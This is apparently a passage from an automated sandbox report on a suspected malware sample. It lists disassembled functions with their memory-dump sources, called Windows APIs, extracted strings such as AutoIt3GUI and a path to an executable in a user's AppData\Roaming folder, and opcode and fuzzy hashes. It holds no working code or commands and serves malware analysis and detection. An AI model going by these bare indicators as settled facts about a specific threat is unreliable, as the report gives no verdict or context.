                                                                                                                    Function 00007FF7BB81B778 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1447195878-0
                                                                                                                    • Opcode ID: cad25cac9c97b8d08bbafe1a1b7dd58d6189f7d4eecb4e23cc57ccc73cc2708c
                                                                                                                    • Instruction ID: c043f784c9d6677190607e21e06324fbb104958ce3947e4c034663080bb8bc29
                                                                                                                    • Opcode Fuzzy Hash: cad25cac9c97b8d08bbafe1a1b7dd58d6189f7d4eecb4e23cc57ccc73cc2708c
                                                                                                                    • Instruction Fuzzy Hash: 0A018B20A0A34682EA59B77D910517C92517FAEF80FC41838DF1E027FEDD2CB82042B0
                                                                                                                    Function 00007FF7BB859260 Relevance: 6.0, APIs: 4, Instructions: 37sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2875609808-0
                                                                                                                    • Opcode ID: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                                                                    • Instruction ID: 30e912dbf15b8ab1b3c41728b889c95a33a0139acc95e91ab468f10f09906f3b
                                                                                                                    • Opcode Fuzzy Hash: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                                                                    • Instruction Fuzzy Hash: 2A01D610A08B8B42EA167B3C90851BBF361BFB6745F841335EE8F61578CF2CF5A58690
                                                                                                                    Function 00007FF7BB84D4EC Relevance: 6.0, APIs: 4, Instructions: 24threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3974789173-0
                                                                                                                    • Opcode ID: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                                                                    • Instruction ID: 4b3e5187b11ee600625aa3bf843bd6fbff9a4340c64e26980ea012361ea07357
                                                                                                                    • Opcode Fuzzy Hash: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                                                                    • Instruction Fuzzy Hash: 99F06C52A1960182FF516F7DEC087A86390BF65F85FC45135CE4E42268DF3CE9A9C390
                                                                                                                    Function 00007FF7BB84326E Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2889604237-0
                                                                                                                    • Opcode ID: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                                                                    • Instruction ID: b16052bcdf0f7c160b5d1e354a43fb2016d5059f3042322c2f2bb9ed332aaa2f
                                                                                                                    • Opcode Fuzzy Hash: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                                                                    • Instruction Fuzzy Hash: 44E0E520A093528AFA00AB7EA85C278A254BF6AFC5F805031CE0E17B79DE3DB0158790
                                                                                                                    Function 00007FF7BB843287 Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2889604237-0
                                                                                                                    • Opcode ID: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                                                                    • Instruction ID: 2a3805e6a3a4788708b4c40b54f673bcf467233b3c8f19a50b64b604ae597e4a
                                                                                                                    • Opcode Fuzzy Hash: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                                                                    • Instruction Fuzzy Hash: 60E01A20A0934286EE00AB7EE85C178A254BF5AFC5F805031CE0E17B79DE3DB0058750
                                                                                                                    Function 00007FF7BB81CC78 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: gfffffff
                                                                                                                    • API String ID: 3215553584-1523873471
                                                                                                                    • Opcode ID: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                                                                                    • Instruction ID: 6fc70944dc043766f7f59a08e9751fd315da96f14003ae75375a9c45fc7c19fb
                                                                                                                    • Opcode Fuzzy Hash: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                                                                                    • Instruction Fuzzy Hash: 75914B62B0A38685EB119F2E91403BCAB55BBBA7C0F448131DF8D0B3A9DE7CE521C751
                                                                                                                    Function 00007FF7BB851D10 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 200comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ContainedObject
                                                                                                                    • String ID: AutoIt3GUI$Container
                                                                                                                    • API String ID: 3565006973-3941886329
                                                                                                                    • Opcode ID: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                                                                                    • Instruction ID: fbff89e8d55b810854ceb335923ba60a1e5761fd884a902e4d294ee420cf9866
                                                                                                                    • Opcode Fuzzy Hash: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                                                                                    • Instruction Fuzzy Hash: D2914836604B4681DB24EF2DE4906ADB3A0FB99B84F918036DF8D43728DF79D865C790
                                                                                                                    Function 00007FF7BB81D0A8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: e+000$gfff
                                                                                                                    • API String ID: 3215553584-3030954782
                                                                                                                    • Opcode ID: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                                                                                    • Instruction ID: 0cc1dab7468916a48302414411ccf3090e6c9f3e729ff3ad46660290cc7ce546
                                                                                                                    • Opcode Fuzzy Hash: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                                                                                    • Instruction Fuzzy Hash: 9F515B62B197C246E7259F3D984036DEA92F7D6B90F889231CF9C47AE9CE2CE050C750
                                                                                                                    Function 00007FF7BB81A09C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                    • String ID: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe
                                                                                                                    • API String ID: 3307058713-1611202206
                                                                                                                    • Opcode ID: 6c87e2de3f4c0aeac315ff4329a83c64bfbcc05b24579d353487348f4d7a711e
                                                                                                                    • Instruction ID: 6495e1aedc2f98360b4067136089836687b68de3edeb398a36a4fb4ef28ef7d1
                                                                                                                    • Opcode Fuzzy Hash: 6c87e2de3f4c0aeac315ff4329a83c64bfbcc05b24579d353487348f4d7a711e
                                                                                                                    • Instruction Fuzzy Hash: B941A232A0975689E714EF2DD8400BDA7A4FF9AB90B844031EF0E07769DE3CE465C3A0
                                                                                                                    Function 00007FF7BB889E08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CreateDestroyMessageObjectSendStock
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 3467290483-2160076837
                                                                                                                    • Opcode ID: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                                                                    • Instruction ID: bdc795b230ec945f6a77ac997a629971aad17f9692af49561a47e7c8a5512b72
                                                                                                                    • Opcode Fuzzy Hash: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                                                                    • Instruction Fuzzy Hash: F3413E325086C287D670AF29E4447AEB7A1FB95790F504135EFE903AA9DF3CE481CB50
                                                                                                                    Function 00007FF7BB875E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                                                    • String ID: 255.255.255.255
                                                                                                                    • API String ID: 2496851823-2422070025
                                                                                                                    • Opcode ID: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                                                                                    • Instruction ID: 6617b9bf7f7b884e003ef8d5e53bd6f5ddb8470320d990648e65d51e4a5d6987
                                                                                                                    • Opcode Fuzzy Hash: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                                                                                    • Instruction Fuzzy Hash: D731D422A0864281EB10EB2ED4501BCB760FF66B98F858532DF6D433B9DE3CD595C350
                                                                                                                    Function 00007FF7BB8703C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintf
                                                                                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                    • API String ID: 3988819677-2584243854
                                                                                                                    • Opcode ID: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
                                                                                                                    • Instruction ID: 82c3bf56b5a52ddf005476b0526527d988cdf6bfd4f5133c9f94bbeb9f8e2a26
                                                                                                                    • Opcode Fuzzy Hash: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
                                                                                                                    • Instruction Fuzzy Hash: E8315E76A08B0299EB10EB6DE4501AC6765FB66788F904032DF0D1777DCF38E556C3A0
                                                                                                                    Function 00007FF7BB88B224 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CreateMessageObjectSendStock
                                                                                                                    • String ID: $SysTabControl32
                                                                                                                    • API String ID: 2080134422-3143400907
                                                                                                                    • Opcode ID: bda9a96d7587ee0db61141e8122984108ce719646b8dc1b3190cd5c08410ff98
                                                                                                                    • Instruction ID: 326f8b6ff7266f1bfcf8961b097acddfcbaead5de2fcd753150f76df42eef241
                                                                                                                    • Opcode Fuzzy Hash: bda9a96d7587ee0db61141e8122984108ce719646b8dc1b3190cd5c08410ff98
                                                                                                                    • Instruction Fuzzy Hash: 4F318A325087C18BE7209F29E80879AB7A0F795BA0F544335EFA807AE8CB39D4518F50
                                                                                                                    Function 00007FF7BB81DC30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileHandleType
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 3000768030-2766056989
                                                                                                                    • Opcode ID: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                                                                                    • Instruction ID: a3e6842d6f305f144dd620be443bc4aaa880d6d40850e063496d7f3e57345ce7
                                                                                                                    • Opcode Fuzzy Hash: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                                                                                    • Instruction Fuzzy Hash: 5C21E862A0975281EB649B2C9490239A652FBEB774F641335DF6E077F8CE3CD491C390
                                                                                                                    Function 00007FF7BB88A0C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                    • Opcode ID: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                                                                                    • Instruction ID: 83e66cbab7d24e0c0182e8895202c537a1792fa3acb2270f9a9f076d9fb33ad8
                                                                                                                    • Opcode Fuzzy Hash: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                                                                                    • Instruction Fuzzy Hash: 60314B36A08781CBD724DF29E444B5AB7A5F788790F504239EB9943BA8CB3CE851CF50
                                                                                                                    Function 00007FF7BB889868 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                    • String ID: Combobox
                                                                                                                    • API String ID: 1025951953-2096851135
                                                                                                                    • Opcode ID: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
                                                                                                                    • Instruction ID: ebe93845e42f0c1ce18be79bd8474e57f3cba94d95d72a807564f2d32228d649
